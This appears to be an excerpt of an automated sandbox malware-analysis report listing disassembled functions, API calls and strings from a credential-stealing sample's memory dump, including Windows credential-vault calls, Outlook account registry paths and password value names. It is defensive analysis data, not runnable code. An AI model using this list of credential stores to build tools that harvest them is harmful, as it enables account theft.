                                                                                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                      APIs
                                                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                      • strchr.MSVCRT ref: 004042F6
                                                                                                      • strlen.MSVCRT ref: 0040430A
                                                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                                                      • strchr.MSVCRT ref: 0040433C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                                      • API String ID: 3866421160-4070641962
                                                                                                      • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                      • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                      APIs
                                                                                                      • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                      • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                      • memset.MSVCRT ref: 004097BD
                                                                                                      • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                      • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                      • API String ID: 1035899707-3647959541
                                                                                                      • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                      • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                      • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                      • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                      APIs
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                      • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                      • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                      • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                        • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                        • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                        • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                      • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                      • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                      • SetFocus.USER32(?), ref: 0040CB92
                                                                                                      • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                      • String ID:
                                                                                                      • API String ID: 1416211542-0
                                                                                                      • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                      • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                      • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                      • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                      • API String ID: 2360744853-2229823034
                                                                                                      • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                      • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                      APIs
                                                                                                      • strchr.MSVCRT ref: 004100E4
                                                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                                                      • memset.MSVCRT ref: 00410129
                                                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                      • memset.MSVCRT ref: 00410171
                                                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                      • String ID: \systemroot
                                                                                                      • API String ID: 912701516-1821301763
                                                                                                      • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                      • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                      • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE$`{/h
                                                                                                      • API String ID: 3718511928-945619159
                                                                                                      • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                      • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                      • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                      • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                      APIs
                                                                                                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                      Strings
                                                                                                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                      • API String ID: 1640410171-2022683286
                                                                                                      • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                      • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                      • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                      • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                      APIs
                                                                                                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$strlen
                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                      • API String ID: 2619041689-3408036318
                                                                                                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00402C9D
                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                      • memset.MSVCRT ref: 00402CF7
                                                                                                      • sprintf.MSVCRT ref: 00402D10
                                                                                                      • sprintf.MSVCRT ref: 00402D4E
                                                                                                        • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$sprintf$Enum
                                                                                                      • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username$`{/h
                                                                                                      • API String ID: 4097761685-4165040241
                                                                                                      • Opcode ID: 869051c230eb502fc44b367a44f21f84098f34e7cd62e2c849a0e400a837e146
                                                                                                      • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                      • Opcode Fuzzy Hash: 869051c230eb502fc44b367a44f21f84098f34e7cd62e2c849a0e400a837e146
                                                                                                      • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$strlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 667451143-3916222277
                                                                                                      • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                      • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                      • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                      • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F567
                                                                                                      • memset.MSVCRT ref: 0040F57F
                                                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                                      • String ID: $`{/h
                                                                                                      • API String ID: 78143705-2966981860
                                                                                                      • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                      • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                      APIs
                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                                                      • memset.MSVCRT ref: 0040882A
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                      • String ID: J$Microsoft_WinInet
                                                                                                      • API String ID: 3318079752-260894208
                                                                                                      • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                      • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F84A
                                                                                                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                      • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                      • String ID: Creds$`{/h$ps:password
                                                                                                      • API String ID: 2290531041-1380238539
                                                                                                      • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                      • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                      • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                      • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004037EB
                                                                                                      • memset.MSVCRT ref: 004037FF
                                                                                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                      • strchr.MSVCRT ref: 0040386E
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                      • strlen.MSVCRT ref: 00403897
                                                                                                      • sprintf.MSVCRT ref: 004038B7
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                                      • String ID: %s@yahoo.com
                                                                                                      • API String ID: 2240714685-3288273942
                                                                                                      • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                      • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                      • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                      • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                      • API String ID: 2780580303-317687271
                                                                                                      • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                      • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                      • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                      • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                      • API String ID: 888011440-2039793938
                                                                                                      • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                      • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • too many attached databases - max %d, xrefs: 0042E951
                                                                                                      • database is already attached, xrefs: 0042EA97
                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                      • out of memory, xrefs: 0042EBEF
                                                                                                      • database %s is already in use, xrefs: 0042E9CE
                                                                                                      • unable to open database: %s, xrefs: 0042EBD6
                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                      • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                      • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
